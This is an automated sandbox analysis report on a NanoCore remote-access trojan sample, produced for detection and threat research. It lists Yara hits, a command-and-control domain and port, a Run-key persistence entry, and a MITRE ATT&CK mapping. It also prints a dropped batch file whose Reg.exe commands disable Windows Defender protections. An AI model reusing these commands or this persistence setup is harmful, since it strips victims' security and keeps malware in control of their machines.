          Source: Yara matchFile source: 00000002.00000002.597461394.0000000000902000.00000002.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.603266642.00000000041BA000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.377356574.0000000003421000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.376298581.0000000000C62000.00000002.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000000.357721819.0000000000C62000.00000002.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Service.exe PID: 6520, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 7056, type: MEMORY
          Source: Yara matchFile source: C:\Users\user\Desktop\Service.exe, type: DROPPED
          Source: Yara matchFile source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
          Source: Yara matchFile source: 2.2.Service.exe.41d2a15.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.0.dhcpmon.exe.c60000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Service.exe.5844629.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Service.exe.41ce3ec.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.Service.exe.900000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Service.exe.41ce3ec.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.dhcpmon.exe.c60000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.dhcpmon.exe.4472a15.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Service.exe.5840000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.dhcpmon.exe.44695b6.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.dhcpmon.exe.446e3ec.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Service.exe.5840000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Service.exe.41c95b6.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Service.exe.900000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.dhcpmon.exe.446e3ec.5.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Detected Nanocore RatShow sources
          Source: Service.exeString found in binary or memory: NanoCore.ClientPluginHost
          Source: Service.exe, 00000002.00000002.603266642.00000000041BA000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
          Source: dhcpmon.exeString found in binary or memory: NanoCore.ClientPluginHost
          Source: dhcpmon.exe, 00000010.00000002.377390680.0000000004421000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
          Source: dhcpmon.exe.2.drString found in binary or memory: NanoCore.ClientPluginHost
          Yara detected Nanocore RATShow sources
          Source: Yara matchFile source: 00000010.00000002.377390680.0000000004421000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.332243003.0000000000902000.00000002.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.604957919.0000000005840000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.597461394.0000000000902000.00000002.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.603266642.00000000041BA000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.377356574.0000000003421000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.376298581.0000000000C62000.00000002.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000000.357721819.0000000000C62000.00000002.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Service.exe PID: 6520, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: dhcpmon.exe PID: 7056, type: MEMORY
          Source: Yara matchFile source: C:\Users\user\Desktop\Service.exe, type: DROPPED
          Source: Yara matchFile source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
          Source: Yara matchFile source: 2.2.Service.exe.41d2a15.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.0.dhcpmon.exe.c60000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Service.exe.5844629.10.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Service.exe.41ce3ec.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.Service.exe.900000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Service.exe.41ce3ec.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.dhcpmon.exe.c60000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.dhcpmon.exe.4472a15.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Service.exe.5840000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.dhcpmon.exe.44695b6.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.dhcpmon.exe.446e3ec.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Service.exe.5840000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Service.exe.41c95b6.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.Service.exe.900000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.dhcpmon.exe.446e3ec.5.raw.unpack, type: UNPACKEDPE
          Source: C:\Users\user\Desktop\Service.exeCode function: 2_2_02E025F2 bind,
          Source: C:\Users\user\Desktop\Service.exeCode function: 2_2_02E025A0 bind,

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsScripting1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1Input Capture21System Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsNative API1Boot or Logon Initialization ScriptsAccess Token Manipulation1Deobfuscate/Decode Files or Information11LSASS MemoryFile and Directory Discovery3Remote Desktop ProtocolInput Capture21Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsCommand and Scripting Interpreter12Logon Script (Windows)Process Injection12Scripting1Security Account ManagerSystem Information Discovery35SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationRemote Access Software1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol1SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing13LSA SecretsSecurity Software Discovery131SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol21Manipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsMasquerading2DCSyncVirtualization/Sandbox Evasion31Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobModify Registry1Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Virtualization/Sandbox Evasion31/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Access Token Manipulation1Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronProcess Injection12Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
          Compromise Software Supply ChainUnix ShellLaunchdLaunchdHidden Files and Directories1KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 412429 Sample: 01d32b29_by_Libranalysis Startdate: 12/05/2021 Architecture: WINDOWS Score: 100 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 Antivirus detection for dropped file 2->60 62 10 other signatures 2->62 9 01d32b29_by_Libranalysis.exe 7 2->9         started        12 dhcpmon.exe 3 2->12         started        process3 file4 34 C:\Users\user\Desktop\Service.exe, PE32 9->34 dropped 36 C:\Users\user\Desktop\Main.exe, PE32+ 9->36 dropped 14 Service.exe 1 10 9->14         started        19 Main.exe 8 9->19         started        38 C:\Users\user\AppData\...\dhcpmon.exe.log, ASCII 12->38 dropped process5 dnsIp6 44 likedoingthis.ddns.net 91.109.188.5, 1337 IELOIELOMainNetworkFR France 14->44 46 192.168.2.1 unknown unknown 14->46 40 C:\Program Files (x86)\...\dhcpmon.exe, PE32 14->40 dropped 42 C:\Users\user\AppData\Roaming\...\run.dat, International 14->42 dropped 48 Antivirus detection for dropped file 14->48 50 Multi AV Scanner detection for dropped file 14->50 52 Machine Learning detection for dropped file 14->52 54 Hides that the sample has been downloaded from the Internet (zone.identifier) 14->54 21 cmd.exe 1 19->21         started        file7 signatures8 process9 signatures10 64 Uses cmd line tools excessively to alter registry or file data 21->64 24 reg.exe 1 21->24         started        26 conhost.exe 21->26         started        28 reg.exe 1 21->28         started        30 5 other processes 21->30 process11 process12 32 conhost.exe 24->32         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          01d32b29_by_Libranalysis.exe48%VirustotalBrowse
          01d32b29_by_Libranalysis.exe55%ReversingLabsByteCode-MSIL.Backdoor.NanoCore
          01d32b29_by_Libranalysis.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe100%AviraTR/Dropper.MSIL.Gen7
          C:\Users\user\Desktop\Service.exe100%AviraTR/Dropper.MSIL.Gen7
          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe100%Joe Sandbox ML
          C:\Users\user\Desktop\Service.exe100%Joe Sandbox ML
          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe80%VirustotalBrowse
          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe98%ReversingLabsByteCode-MSIL.Backdoor.NanoCore
          C:\Users\user\Desktop\Main.exe32%ReversingLabsWin64.PUA.Wacapew
          C:\Users\user\Desktop\Service.exe98%ReversingLabsByteCode-MSIL.Backdoor.NanoCore

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          16.0.dhcpmon.exe.c60000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
          2.0.Service.exe.900000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
          16.2.dhcpmon.exe.c60000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
          2.2.Service.exe.900000.0.unpack100%AviraTR/Dropper.MSIL.Gen7Download File
          2.2.Service.exe.5840000.9.unpack100%AviraTR/NanoCore.fadteDownload File

          Domains

          SourceDetectionScannerLabelLink
          likedoingthis.ddns.net0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          0%Avira URL Cloudsafe
          likedoingthis.ddns.net0%VirustotalBrowse
          likedoingthis.ddns.net0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          likedoingthis.ddns.net
          		91.109.188.5
          		truetrueunknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          true
          • Avira URL Cloud: safe
          		low
          likedoingthis.ddns.nettrue
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown

          Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public

          IPDomainCountryFlagASNASN NameMalicious
          91.109.188.5
          		likedoingthis.ddns.netFrance
          		29075IELOIELOMainNetworkFRtrue

          Private

          IP
          192.168.2.1

          General Information

          Joe Sandbox Version:32.0.0 Black Diamond
          Analysis ID:412429
          Start date:12.05.2021
          Start time:17:33:17
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 10m 53s
          Hypervisor based Inspection enabled:false
          Report type:light
          Sample file name:01d32b29_by_Libranalysis (renamed file extension from none to exe)
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed:35
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal100.troj.evad.winEXE@24/6@8/2
          EGA Information:Failed
          HDC Information:
          • Successful, ratio: 54.2% (good quality ratio 44.3%)
          • Quality average: 62.7%
          • Quality standard deviation: 36.7%
          HCA Information:
          • Successful, ratio: 68%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          Warnings:
          Show All
          • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
          • Excluded IPs from analysis (whitelisted): 13.88.21.125, 92.122.145.220, 13.64.90.137, 52.147.198.201, 40.88.32.150, 168.61.161.212, 20.50.102.62, 92.122.213.247, 92.122.213.194, 2.20.142.209, 2.20.143.16, 52.155.217.156, 20.54.26.129, 184.30.24.56
          • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.

          Simulations

          Behavior and APIs

          TimeTypeDescription
          17:34:11API Interceptor1045x Sleep call for process: Service.exe modified
          17:34:13AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run DHCP Monitor C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

          Joe Sandbox View / Context

          IPs

          No context

          Domains

          No context

          ASN

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          IELOIELOMainNetworkFR684A5F52ADD55DFB891523AC71E822022DE97AF06BA52.exeGet hashmaliciousBrowse
          • 141.255.144.80
          tf2j9VpHie.exeGet hashmaliciousBrowse
          • 91.109.178.9
          SSWgdtO0DX.exeGet hashmaliciousBrowse
          • 91.109.190.3
          SQ7RDC69M5.exeGet hashmaliciousBrowse
          • 141.255.152.35
          1YyuQvKv.exeGet hashmaliciousBrowse
          • 141.255.158.200
          LeG1rd98Ra.exeGet hashmaliciousBrowse
          • 141.255.156.15
          FzDN7GfLRo.exeGet hashmaliciousBrowse
          • 141.255.152.120
          CRnc9agoYt.exeGet hashmaliciousBrowse
          • 141.255.152.141
          OEGVaZRADt.exeGet hashmaliciousBrowse
          • 141.255.152.155
          6RtJvAEs.exeGet hashmaliciousBrowse
          • 141.255.147.10
          CTpgkYwhLg.exeGet hashmaliciousBrowse
          • 91.109.186.13
          ixTrpAt2an.exeGet hashmaliciousBrowse
          • 141.255.150.137
          yfSMg0NL6F.exeGet hashmaliciousBrowse
          • 141.255.155.120
          lfLNfqEEOr.exeGet hashmaliciousBrowse
          • 141.255.155.120
          e2.exeGet hashmaliciousBrowse
          • 141.255.155.120
          xciwFNwa.exeGet hashmaliciousBrowse
          • 91.109.188.13
          vizE0jxu.exeGet hashmaliciousBrowse
          • 91.109.188.13
          EhXUMhhD.exeGet hashmaliciousBrowse
          • 91.109.188.13
          u3yRz9jL.exeGet hashmaliciousBrowse
          • 91.109.176.3
          e5QFrSSa.exeGet hashmaliciousBrowse
          • 91.109.176.3

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Created / dropped Files

          C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          Process:C:\Users\user\Desktop\Service.exe
          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
          Category:dropped
          Size (bytes):207360
          Entropy (8bit):7.449966518902096
          Encrypted:false
          SSDEEP:3072:gzEqV6B1jHa6dtJ10jgvzcgi+oG/j9iaMP2s/HIwv5fUisD1NHmB5n7lnQidogwK:gLV6Bta6dtJmakIM5fjsDM5nZQi+nK
          MD5:A54512682E96BF7475C189E0D85C4B1F
          SHA1:7041CD71EA3E68ACDF4F4BF7A948C59C42B66121
          SHA-256:B3043783DD5D3E129E50CE47CFE69A777FCDF4F79DC093DC5B39BA2BFAEEE609
          SHA-512:8EE2D3771C779349C0965FF959F1A3AA87B3EA5A642BDAF3D907B8B7C4062B88239CCA94BA6BD537A52DF3A8627FB1592C90236E6A0A7449A9B231832FA15C5C
          Malicious:true
          Yara Hits:
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, Author: Kevin Breen <kevin@techanarchy.net>
          Antivirus:
          • Antivirus: Avira, Detection: 100%
          • Antivirus: Joe Sandbox ML, Detection: 100%
          • Antivirus: Virustotal, Detection: 80%, Browse
          • Antivirus: ReversingLabs, Detection: 98%
          Reputation:low
          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....'.T.....................`........... ........@.. ......................................................................8...W.... ...]........................................................................... ............... ..H............text........ ...................... ..`.reloc..............................@..B.rsrc....]... ...^..................@..@................t.......H...........T............................................................0..Q........o5.......*.o6....-.&......3+..+.... ....3......1..... 2.... ....3.... .......*.*....0..E.......s7....-(&s8....-&&s9....,$&s:........s;........*.....+.....+.....+.....0..........~....o<...*..0..........~....o=...*..0..........~....o>...*..0..........~....o?...*..0..........~....o@...*..0.............-.&(A...*&+...0..$.......~B........-.(...+.-.&+..B...+.~B...*.0.............-.&(A...*&+...0..
          C:\Users\user\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\dhcpmon.exe.log
          Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):525
          Entropy (8bit):5.2874233355119316
          Encrypted:false
          SSDEEP:12:Q3LaJU20NaL10U29hJ5g1B0U2ukyrFk70Ug+9Yz9tv:MLF20NaL329hJ5g522rWz2T
          MD5:61CCF53571C9ABA6511D696CB0D32E45
          SHA1:A13A42A20EC14942F52DB20FB16A0A520F8183CE
          SHA-256:3459BDF6C0B7F9D43649ADAAF19BA8D5D133BCBE5EF80CF4B7000DC91E10903B
          SHA-512:90E180D9A681F82C010C326456AC88EBB89256CC769E900BFB4B2DF92E69CA69726863B45DFE4627FC1EE8C281F2AF86A6A1E2EF1710094CCD3F4E092872F06F
          Malicious:true
          Preview: 1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System\1ffc437de59fb69ba2b865ffdc98ffd1\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\54d944b3ca0ea1188d700fbd8089726b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\bd8d59c984c9f5f2695f64341115cdf0\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_32\Microsoft.VisualBas#\cd7c74fce2a0eab72cd25cbe4bb61614\Microsoft.VisualBasic.ni.dll",0..
          C:\Users\user\AppData\Local\Temp\DFA1.tmp\DFA2.tmp\DFA3.bat
          Process:C:\Users\user\Desktop\Main.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):1487
          Entropy (8bit):5.031356173135581
          Encrypted:false
          SSDEEP:24:wwIpB+VMxNcdVbUO4cdVt4cdV7F4cdVbT4cdVbUO4cdVbh0KsA4IBIPGv:4+u6KO46D469F46F46KO46H0KF4IBIP4
          MD5:6ADD1B97023EA11BCFBC2D73966AF51C
          SHA1:52A90BC9480C9FE6C2D03524680D489D6F532472
          SHA-256:98407A93DAD2A0AFC18A428031D61DCA86D19EB8E819C5468DC47AE4AF4B85A4
          SHA-512:E229FC8B25982DAA69CD80EDA1F808E954AA6A116AAB2800C1003497512893A5F0DA5EE489277B29F056C019E0D41ECD0B73236CD8FEAE226A533FD86054F398
          Malicious:false
          Preview: @shift /0..@Echo Off..Title Reg Converter v1.2 & Color 1A..cd %systemroot%\system32..call :IsAdmin....:: --------------------------------------------------- !!! Incorrect Data Found !!! -------------------------------------------------------------..:: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection --> Windows Registry Editor Version 5.00..:: ------------------------------------------------------------------------------------------------------------------------------------------------....Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f..Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f..Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f..Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Pro
          C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
          Process:C:\Users\user\Desktop\Service.exe
          File Type:International EBCDIC text, with NEL line terminators
          Category:dropped
          Size (bytes):8
          Entropy (8bit):3.0
          Encrypted:false
          SSDEEP:3:Ftn:Ftn
          MD5:74FC5B26A8043CEF0CBB783D7D271C6A
